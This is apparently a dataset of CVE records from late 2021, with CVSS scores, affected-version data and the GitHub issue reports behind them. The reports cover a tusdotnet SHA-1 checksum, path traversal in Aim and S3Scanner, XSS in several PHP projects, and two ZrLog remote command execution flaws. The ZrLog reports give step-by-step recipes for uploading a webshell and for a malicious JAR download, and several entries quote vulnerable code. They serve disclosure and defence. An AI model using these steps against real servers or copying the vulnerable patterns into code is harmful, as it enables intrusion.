[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tusdotnet/tusdotnet/issues/157" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tusdotnet/tusdotnet/issues/157" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:transloadit:tusdotnet:*:*:*:*:*:*:*:*", "matchCriteriaId": "7AAB1BBC-8675-44A2-890D-5E2B3DCC185B", "versionEndExcluding": null, "versionEndIncluding": "2.5.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "326" ]
326
https://github.com/tusdotnet/tusdotnet/issues/157
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "tusdotnet", "tusdotnet" ]
SHA-1 is not collision-resistant, which makes it easier for context-dependent attackers to conduct tampering attacks and alter the checksum which makes it possible to alter the file being uploaded itself. For a long time, it has been possible "to find collisions for SHA1 and that thus it is not secure to use for digital signatures, file integrity, and file identification purposes". see: https://arstechnica.com/information-technology/2017/02/at-deaths-door-for-years-widely-used-sha1-function-is-now-dead/ Also: https://www.cvedetails.com/cve/CVE-2005-4900/ https://cwe.mitre.org/data/definitions/328.html Finding: https://github.com/tusdotnet/tusdotnet/blob/ca23bdd88f5b63545c6fb9c2ed18b12984da3078/Source/tusdotnet/Extensions/Internal/FileStreamExtensions.cs https://github.com/tusdotnet/tusdotnet/blob/ca23bdd88f5b63545c6fb9c2ed18b12984da3078/Source/tusdotnet/Stores/TusDiskStore.cs#L190 https://github.com/tusdotnet/tusdotnet/blob/3d933e56768f3233a66417a6f9413364fb8bec37/Source/tusdotnet/Interfaces/ITusChecksumStore.cs#L17 https://github.com/tusdotnet/tusdotnet/blob/2fdded4e2e5682a92cf102b0d1bae12e3dec06fe/Source/tusdotnet/Stores/TusDiskStore.cs#L248 https://github.com/tusdotnet/tusdotnet/blob/c3f6f93bd3f0c76a5fd6572835a8d0f5f15909db/Source/tusdotnet/Helpers/ChecksumTrailerHelper.cs https://github.com/tusdotnet/tusdotnet/blob/c3f6f93bd3f0c76a5fd6572835a8d0f5f15909db/Source/tusdotnet/Helpers/ChecksumTrailerHelper.cs#L15
Tus client uses a deprecated cryptographic function to calculate the file checksums
https://api.github.com/repos/tusdotnet/tusdotnet/issues/157/comments
4
2021-11-22T11:42:09Z
2021-12-07T11:55:42Z
https://github.com/tusdotnet/tusdotnet/issues/157
1,060,053,964
157
2,804
CVE-2021-43775
2021-11-23T21:15:20.347
Aim is an open-source, self-hosted machine learning experiment tracking tool. Versions of Aim prior to 3.1.0 are vulnerable to a path traversal attack. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. The vulnerability issue is resolved in Aim v3.1.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Product" ], "url": "https://github.com/aimhubio/aim/blob/0b99c6ca08e0ba7e7011453a2f68033e9b1d1bce/aim/web/api/views.py#L9-L16" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aimhubio/aim/issues/999" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/aimhubio/aim/pull/1003" }, { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/aimhubio/aim/pull/1003/commits/f01266a1a479ef11d7d6c539e7dd89e9d5639738" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/aimhubio/aim/security/advisories/GHSA-8phj-f9w2-cjcc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/aimhubio/aim/blob/0b99c6ca08e0ba7e7011453a2f68033e9b1d1bce/aim/web/api/views.py#L9-L16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aimhubio/aim/issues/999" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/aimhubio/aim/pull/1003" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/aimhubio/aim/pull/1003/commits/f01266a1a479ef11d7d6c539e7dd89e9d5639738" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/aimhubio/aim/security/advisories/GHSA-8phj-f9w2-cjcc" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:aimstack:aim:*:*:*:*:*:python:*:*", "matchCriteriaId": "AE237926-EEBB-4E1F-9F74-FB5845332FC8", "versionEndExcluding": "3.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/aimhubio/aim/issues/999
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aimhubio", "aim" ]
What would be the right contact to report a security vulnerabilty? thanks!
Security vulnerabilty
https://api.github.com/repos/aimhubio/aim/issues/999/comments
3
2021-11-11T12:25:17Z
2021-11-22T22:01:39Z
https://github.com/aimhubio/aim/issues/999
1,050,926,195
999
2,805
CVE-2021-44093
2021-11-28T21:15:08.140
A Remote Command Execution vulnerability on the background in zrlog 2.2.2, at the upload avatar function, could bypass the original limit, upload the JSP file to get a WebShell
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/issues/115" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/issues/115" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zrlog:zrlog:2.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "EE12F09D-97E1-4D23-BCBC-300E40800811", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/94fzb/zrlog/issues/115
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "94fzb", "zrlog" ]
there is a remote command execution vulnerability at the upload avatar function on the background. <img width="1792" alt="image" src="https://user-images.githubusercontent.com/24983597/141939276-609ba696-f974-470f-8c2e-2e1cf67e98c6.png"> upload pictures, then intercept data package, like this ![image](https://user-images.githubusercontent.com/24983597/141939544-fd00c64c-76dc-4003-b81f-5c07038a1628.png) then modify the file name to `jsp`, you can bypass the limit that cannot be uploaded by JSP files. ![image](https://user-images.githubusercontent.com/24983597/141939799-531e3f1d-cd91-4e74-9908-fc87bfe5b76d.png) although JSP files have been uploaded, because of the existence of global interceptors, we cannot execute commands. it would return 500 <img width="912" alt="image" src="https://user-images.githubusercontent.com/24983597/141940263-627894b2-c89f-4ccf-9735-262d6ecbe303.png"> however, through my research, I found that the upload directory can be traversed. just modify the parameter `dir`, like this ![image](https://user-images.githubusercontent.com/24983597/141940558-b033151a-9d6b-4371-8833-277efaed8a51.png) then the file will be saved to the corresponding directory. <img width="702" alt="image" src="https://user-images.githubusercontent.com/24983597/141940679-f61ea194-cbd8-4290-bdfe-cbc942d52278.png"> access this file, successfully execute system command <img width="901" alt="image" src="https://user-images.githubusercontent.com/24983597/141940898-eeb516d3-39e2-4320-950b-62a823cb2a8c.png"> --- Code analysis. at `com.zrlog.admin.web.controller.api.UploadController#generatorUri` ```java getFile().getFileName().substring(getFile(uploadFieldName).getFileName().lastIndexOf(".") + 1).toLowerCase(); ``` <img width="1792" alt="image" src="https://user-images.githubusercontent.com/24983597/141941772-a6fb023a-1ded-4fb6-b0ea-e77cd5569736.png"> ```java Constants.ATTACHED_FOLDER + getPara("dir") + "/" + sdf.format(new Date()) + "/" + df.format(new Date()) + "_" + new Random().nextInt(1000) + "." + fileExt; ``` <img width="1792" alt="image" src="https://user-images.githubusercontent.com/24983597/141942105-c7d089e4-f41f-4ea8-86f0-710a89b0c136.png">
ZrLog 2.2.2 Remote command execution vulnerability
https://api.github.com/repos/94fzb/zrlog/issues/115/comments
0
2021-11-16T07:45:28Z
2023-04-15T04:40:43Z
https://github.com/94fzb/zrlog/issues/115
1,054,555,017
115
2,806
CVE-2021-44094
2021-11-28T21:15:08.230
ZrLog 2.2.2 has a remote command execution vulnerability at plugin download function, it could execute any JAR file
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/issues/116" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/issues/116" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zrlog:zrlog:2.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "EE12F09D-97E1-4D23-BCBC-300E40800811", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/94fzb/zrlog/issues/116
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "94fzb", "zrlog" ]
Just download a plugin and intercept your data package. <img width="1791" alt="image" src="https://user-images.githubusercontent.com/24983597/141977057-f4d164bc-c5a7-4e03-b6c2-120cb15a6e5e.png"> data package like this <img width="675" alt="image" src="https://user-images.githubusercontent.com/24983597/141977295-6053c0a8-a718-4f25-9a92-8d25279a134a.png"> modify the JAR just downloaded, join the malicious code in the startup class. <img width="1542" alt="image" src="https://user-images.githubusercontent.com/24983597/141977772-fc35e677-2794-4352-b054-4a85ef1919c9.png"> then modify the parameter `host` to the malicious JAR file download address <img width="1758" alt="image" src="https://user-images.githubusercontent.com/24983597/141977859-1e33fd73-7622-4b3e-88b6-b45024dfc82c.png"> after download, malicious code will be executed <img width="894" alt="image" src="https://user-images.githubusercontent.com/24983597/141977971-b961c26c-1b29-489f-90ce-00d565ea2798.png"> --- Download Record <img width="805" alt="image" src="https://user-images.githubusercontent.com/24983597/141978068-de352e08-b915-4865-b0bf-77ebeb493def.png">
ZrLog 2.2.2 has a remote command execution vulnerability at plugin download function
https://api.github.com/repos/94fzb/zrlog/issues/116/comments
0
2021-11-16T11:45:07Z
2023-04-15T04:40:43Z
https://github.com/94fzb/zrlog/issues/116
1,054,782,351
116
2,807
CVE-2021-32061
2021-11-29T03:15:06.713
S3Scanner before 2.0.2 allows Directory Traversal via a crafted bucket, as demonstrated by a <Key>../ substring in a ListBucketResult element.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/sa7mon/S3Scanner/issues/122" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/sa7mon/S3Scanner/releases/tag/2.0.2" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://vuln.ryotak.me/advisories/62" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/sa7mon/S3Scanner/issues/122" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/sa7mon/S3Scanner/releases/tag/2.0.2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuln.ryotak.me/advisories/62" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:s3scanner_project:s3scanner:*:*:*:*:*:*:*:*", "matchCriteriaId": "877DA417-7D7D-462E-A979-BA23C5F2EED6", "versionEndExcluding": "2.0.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/sa7mon/S3Scanner/issues/122
[ "Third Party Advisory" ]
github.com
[ "sa7mon", "S3Scanner" ]
## tl;dr In version 2.0.1 and older of S3Scanner, if a user attempts to dump the contents of a bucket which contains objects with special characters in their keys, those characters can be used to save the files outside of the folder specified with `--dump-dir`. ## Thanks I'd like to give a huge thanks to a security researcher named [RyotaK](https://twitter.com/ryotkak) for reporting this issue to me. They provided a detailed explanation and helped walk me through the steps to reproduce. Very excellent experience. ## The Bug The issue is what's commonly known as a "path traversal" vulnerability. In this case, though, it's the ability to *save* files outside the intended area as opposed to *reading* files. For example: this bucket was created by RyotaK for demonstration purposes. <img src="https://user-images.githubusercontent.com/3712226/143785640-495acf39-ff99-4bcf-8236-42abd04f2e23.png" alt="screenshot of an S3 bucket listing showing a key called '../' and '../test.txt'" /> See how the object keys contain `../` ? When S3Scanner goes to download that file, it concatenates the dump directory and this key to form the file path the file should get downloaded to. So if a user ran the following command: ```bash s3scanner dump --dump-dir /projects/s3scanner/buckets/ --bucket s3scanner-test-bucket ``` they would end up with a file called `test.txt` in `/projects/s3scanner/` which is one level up from where they wanted it. By adding a bunch of these characters together (`../../../../../`) an attacker could craft a malicious object key which would place their file anywhere on the S3Scanner user's system. You may be surprised (like I was) to learn that AWS allows such characters in object keys. Their documentation [explains](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html) that while you can do this, there are limitations: > ... > > In addition, be aware of the following prefix limitations: > > - Objects with a prefix of "./" must uploaded or downloaded with the AWS Command Line Interface (AWS CLI), AWS SDKs, or REST API. You cannot use the Amazon S3 console. > > - Objects with a prefix of "../" cannot be uploaded using the AWS Command Line Interface (AWS CLI) or Amazon S3 console. In the "real world" the chances of an S3Scanner user encountering a bucket with these "malicious" keys is very low - especially considering I was not able to create such a bucket of my own. This threat poses a fairly low risk since the difficulty of pulling off the attack is a bit high and would only happen if a bad actor was purposely targeting users of this tool. RyotaK has engaged MITRE who has reserved [CVE-2021-32061](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32061) for this vulnerability. The CVE will be updated after this advisory has been posted. ## Remediation The good news is that I have already pushed the fix for this issue (#121). If an object to be downloaded has a key that would land outside of the `--dump-dir`, the file won't be downloaded. The user will get a message that looks like this: <img src="https://user-images.githubusercontent.com/3712226/143785638-d1c87e52-800a-4eba-9ec5-c5f02da96d69.png" alt="Screenshot showing the command-line output of trying to dump the bucket referenced above which contains bad object keys. S3Scanner has skipped the files with relative path characters in their keys." /> I'll be drafting the v2.0.2 release to push out this update across the git repo, PyPi package, and Docker image.
CVE-2021-32061: Path Traversal via dump of malicious bucket
https://api.github.com/repos/sa7mon/S3Scanner/issues/122/comments
0
2021-11-28T21:06:52Z
2021-11-28T21:10:49Z
https://github.com/sa7mon/S3Scanner/issues/122
1,065,436,114
122
2,808
CVE-2021-43698
2021-11-29T12:15:08.217
phpWhois (last update Jun 30 2021) is affected by a Cross Site Scripting (XSS) vulnerability. In file example.php, the exit function will terminate the script and print the message to the user. The message will contain $_GET['query'] then there is a XSS vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sparc/phpWhois.org/issues/21" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sparc/phpWhois.org/issues/21" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpwhois_project:phpwhois:-:*:*:*:*:*:*:*", "matchCriteriaId": "2C29BBA5-ADD5-4475-96FA-1D07395102C0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/sparc/phpWhois.org/issues/21
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sparc", "phpWhois.org" ]
Hello, I would like to report for XSS vulnerability. In file example.php ```php \\ line 38 $query = $_GET['query']; \\ line 64 $resout = str_replace('{query}', $query, $resout); \\ line 111 $resout = str_replace('{result}', $winfo, $resout); \\ line 117 exit(str_replace('{results}', $resout, $out)); ``` exit function will terminate the script and print the message to the user. The message will contain $_GET['query'] then there is XSS vulnerability.
Possible XSS vulnerability
https://api.github.com/repos/sparc/phpWhois.org/issues/21/comments
2
2021-11-15T00:27:17Z
2022-02-22T07:31:38Z
https://github.com/sparc/phpWhois.org/issues/21
1,053,087,598
21
2,809
CVE-2021-43696
2021-11-29T13:15:07.407
twmap v2.91_v4.33 is affected by a Cross Site Scripting (XSS) vulnerability. In file list.php, the exit function will terminate the script and print the message to the user. The message will contain $_REQUEST then there is a XSS vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/happyman/twmap/issues/57" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/happyman/twmap/issues/57" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:twmap_project:twmap:2.91_4.33:*:*:*:*:*:*:*", "matchCriteriaId": "BB593BAE-5F9E-4F5B-B04C-EA5D8170B58C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/happyman/twmap/issues/57
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "happyman", "twmap" ]
Hello, I would like to report for XSS vulnerability. In file https://github.com/happyman/twmap/blob/master/twmap_gen/list.php line 33 ```php $response['sEcho'] = $_REQUEST['sEcho']; // ... //print_r($_REQUEST); exit(json_encode($response)); ``` exit function will terminate the script and print a message which has $_REQUEST. Then there is XSS vulnerability
Possible XSS vulnerability
https://api.github.com/repos/happyman/twmap/issues/57/comments
3
2021-11-14T23:34:42Z
2022-01-03T07:19:10Z
https://github.com/happyman/twmap/issues/57
1,053,073,424
57
2,810
CVE-2021-43697
2021-11-29T13:15:07.447
Workerman-ThinkPHP-Redis (last update Mar 16, 2018) is affected by a Cross Site Scripting (XSS) vulnerability. In file Controller.class.php, the exit function will terminate the script and print the message to the user. The message will contain $_GET{C('VAR_JSONP_HANDLER')] then there is a XSS vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/happyliu2014/Workerman-ThinkPHP-Redis/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/happyliu2014/Workerman-ThinkPHP-Redis/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:workerman-thinkphp-redis_project:workerman-thinkphp-redis:*:*:*:*:*:*:*:*", "matchCriteriaId": "DA1CF84A-B20D-42B5-B355-5A1E57BEF17E", "versionEndExcluding": "2018-03-16", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/happyliu2014/Workerman-ThinkPHP-Redis/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "happyliu2014", "Workerman-ThinkPHP-Redis" ]
Hello, I would like to report for XSS vulnerability. In file https://github.com/happyliu2014/Workerman-ThinkPHP-Redis/blob/master/wmchat/ThinkPHP/Mode/Api/Controller.class.php line 70 ```php $handler = isset($_GET[C('VAR_JSONP_HANDLER')]) ? $_GET[C('VAR_JSONP_HANDLER')] : C('DEFAULT_JSONP_HANDLER'); exit($handler.'('.json_encode($data).');'); ``` exit function will terminate the script and print a message which has $_GET[C('VAR_JSONP_HANDLER')]. Then there is XSS vulnerability.
Possible XSS vulnerability
https://api.github.com/repos/happyliu2014/Workerman-ThinkPHP-Redis/issues/1/comments
1
2021-11-14T23:42:27Z
2024-02-02T23:14:00Z
https://github.com/happyliu2014/Workerman-ThinkPHP-Redis/issues/1
1,053,074,997
1
2,811
CVE-2021-43695
2021-11-29T14:15:08.160
issabelPBX version 2.11 is affected by a Cross Site Scripting (XSS) vulnerability. In file page.backup_restore.php, the exit function will terminate the script and print the message to the user. The message will contain $_REQUEST without sanitization, then there is a XSS vulnerability.
